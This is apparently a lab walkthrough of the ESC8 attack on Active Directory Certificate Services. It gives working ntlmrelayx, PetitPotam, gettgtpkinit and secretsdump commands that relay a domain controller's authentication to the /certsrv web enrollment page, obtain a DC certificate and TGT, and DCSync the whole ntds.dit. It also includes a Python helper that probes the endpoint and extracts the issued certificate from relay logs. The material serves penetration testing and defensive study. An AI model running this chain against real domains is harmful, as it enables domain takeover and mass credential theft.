ESC8 - coerce to domain admin

Active Directory Certificate Services (AD CS) is the Windows Server role (in the form discussed here since Windows Server 2012) that lets an organization build a public key infrastructure (PKI): it issues and manages digital certificates and provides the public key cryptography and digital signature capabilities that depend on them. ESC8 abuses the optional Certificate Authority Web Enrollment role service, which exposes the /certsrv pages over HTTP and accepts NTLM authentication.

PetitPotam is an authentication coercion primitive; what it feeds here is a classic NTLM relay attack, a class Microsoft has documented for years together with mitigation options (for example Microsoft Security Advisory 974926, which introduced Extended Protection for Authentication).

  • To make this attack work we need:

    • AD CS running in the domain with the Web Enrollment role service enabled (the /certsrv endpoint reachable over plain HTTP and accepting NTLM).

    • A working coercion method (here we use unauthenticated PetitPotam; an authenticated PrinterBug or any other coercion method works the same way).

    • A template the relayed account is allowed to enroll in. Since we relay a domain controller's machine account, the default DomainController template, present on every Active Directory, is the useful one for ESC8.

  • Let's check that web enrollment is up and running at: http://192.168.56.23/certsrv/certfnsh.asp (an HTTP 401 carrying a WWW-Authenticate: NTLM or Negotiate header is the answer we want).

  • Add a listener to relay SMB authentication to HTTP with impacket ntlmrelayx

sudo ntlmrelayx.py -t http://192.168.56.23/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
  • Launch the coercion with unauthenticated PetitPotam. This no longer works against an up-to-date Active Directory (Microsoft patched unauthenticated EfsRpc coercion in August 2021, CVE-2021-36942), but authenticated coercion methods work the same way. The first argument is our listener (192.168.56.31), the second the DC we coerce. The coerced host must differ from the CA web server, because NTLM cannot be relayed back to the machine it originated from.

python3 PetitPotam.py 192.168.56.31 baltimore.maryland.local

  • ntlmrelayx relays the authentication to the web enrollment page, enrolls as baltimore$ in the DomainController template and prints the issued certificate as a base64-encoded PKCS#12 blob. Save that blob to base64.b64 and use it to request a TGT through PKINIT with gettgtpkinit.py (from PKINITtools):

python3 gettgtpkinit.py -pfx-base64 $(cat base64.b64) 'maryland.local'/'baltimore$' 'baltimore.ccache'
  • We now hold a TGT for the baltimore$ machine account. Domain controllers have replication rights, so we can run a DCSync and dump the whole ntds.dit content:

export KRB5CCNAME=/home/jefe/ADCS/baltimore.ccache
secretsdump.py -k -no-pass MARYLAND.LOCAL/'baltimore$'@baltimore.maryland.local
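Two pieces of glue the walkthrough leaves to the reader are the web enrollment check and the hand-off of the certificate from the ntlmrelayx output to gettgtpkinit.py. The helper below is an added example written for this page; it is not code from the original page, from impacket or from PKINITtools. It assumes a plain-HTTP /certsrv endpoint like the one above and that ntlmrelayx prints the certificate after a line reading "Base64 certificate of user <ACCOUNT>:" (the parser tolerates the blob on the same or following lines). The log in SAMPLE_LOG is constructed, modeled on that output, and its base64 blob is a short stand-in for a real PKCS#12 file.

```python
"""ESC8 helpers: classify the web-enrollment endpoint and pull the PKCS#12 blob out of ntlmrelayx's log."""
import base64
import re
import sys
import urllib.error
import urllib.request
from urllib.parse import urlparse


def assess_web_enrollment(url, status, headers):
    """Classify a response from /certsrv/certfnsh.asp for ESC8 purposes.

    Returns one of:
      'relayable'     plain HTTP, 401 offering NTLM/Negotiate: the ESC8 precondition is met
      'check-epa'     HTTPS offering NTLM/Negotiate: relay only works if Extended Protection
                      for Authentication is not enforced, which headers alone cannot reveal
      'not-installed' 404: the Web Enrollment role service is not present
      'no-ntlm'       401 without an NTLM/Negotiate challenge
      'unexpected'    anything else (anonymous 200, 403, ...)
    `headers` is any mapping with .items(), e.g. a dict or urllib's HTTPMessage.
    """
    if status == 404:
        return "not-installed"
    if status != 401:
        return "unexpected"
    # Header names are case-insensitive and WWW-Authenticate may appear several times;
    # only the scheme token (first word) matters.
    schemes = [v.strip().split()[0].upper() for k, v in headers.items()
               if k.lower() == "www-authenticate" and v.strip()]
    if not any(s in ("NTLM", "NEGOTIATE") for s in schemes):
        return "no-ntlm"
    return "relayable" if urlparse(url).scheme.lower() == "http" else "check-epa"


def probe(url, timeout=5):
    """Live check: send an unauthenticated GET and classify the answer (not run by the test)."""
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return assess_web_enrollment(url, resp.status, resp.headers)
    except urllib.error.HTTPError as err:  # 401/403/404 surface as exceptions in urllib
        return assess_web_enrollment(url, err.code, err.headers)


CERT_LINE = re.compile(r"Base64 certificate of user (\S+):\s*(\S*)")
B64_CHARS = re.compile(r"^[A-Za-z0-9+/=]+$")


def extract_certificates(log_text):
    """Return {account: base64_pfx} for every certificate ntlmrelayx --adcs logged.

    The blob is accepted only if it is valid base64 whose first byte is 0x30, the ASN.1
    SEQUENCE tag that opens a PKCS#12 file; that is what gettgtpkinit.py -pfx-base64 expects.
    """
    certs = {}
    lines = log_text.splitlines()
    for i, line in enumerate(lines):
        m = CERT_LINE.search(line)
        if not m:
            continue
        account, blob = m.group(1), m.group(2)
        # Continuation lines hold the rest of the blob; stop at a blank line or the next "[*]".
        j = i + 1
        while j < len(lines):
            s = lines[j].strip()
            if not s or not B64_CHARS.match(s):
                break
            blob += s
            j += 1
        try:
            der = base64.b64decode(blob, validate=True)
        except ValueError:
            continue
        if der[:1] == b"\x30":
            certs[account] = blob
    return certs


# Constructed sample, modeled on ntlmrelayx --adcs output; the blob is a 10-byte stand-in.
SAMPLE_LOG = """\
[*] HTTPD(80): Authenticating against http://192.168.56.23 as MARYLAND/BALTIMORE$ SUCCEED
[*] Generating CSR...
[*] Getting certificate...
[*] Base64 certificate of user MARYLAND/BALTIMORE$:
MIIBADCB7QIB
AA==
[*] Writing PKCS#12 certificate to ./MARYLAND/BALTIMORE$.pfx
"""

if __name__ == "__main__":
    if len(sys.argv) == 2 and sys.argv[1].startswith("http"):
        print(probe(sys.argv[1]))                       # python3 esc8_helpers.py http://192.168.56.23/certsrv/certfnsh.asp
    else:
        for account, blob in extract_certificates(sys.stdin.read()).items():
            path = account.replace("/", "_").replace("$", "") + ".b64"
            with open(path, "w") as fh:
                fh.write(blob)
            print(f"{account}: wrote {path} ({len(base64.b64decode(blob))} bytes)")
```

Run the relay as `ntlmrelayx.py ... 2>&1 | tee relay.log`, then `python3 esc8_helpers.py < relay.log` writes one .b64 file per relayed account, which replaces the hand-edited base64.b64 in the gettgtpkinit.py command above. A 'relayable' verdict from the probe is only the precondition: the relayed account still needs enroll rights on the chosen template.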
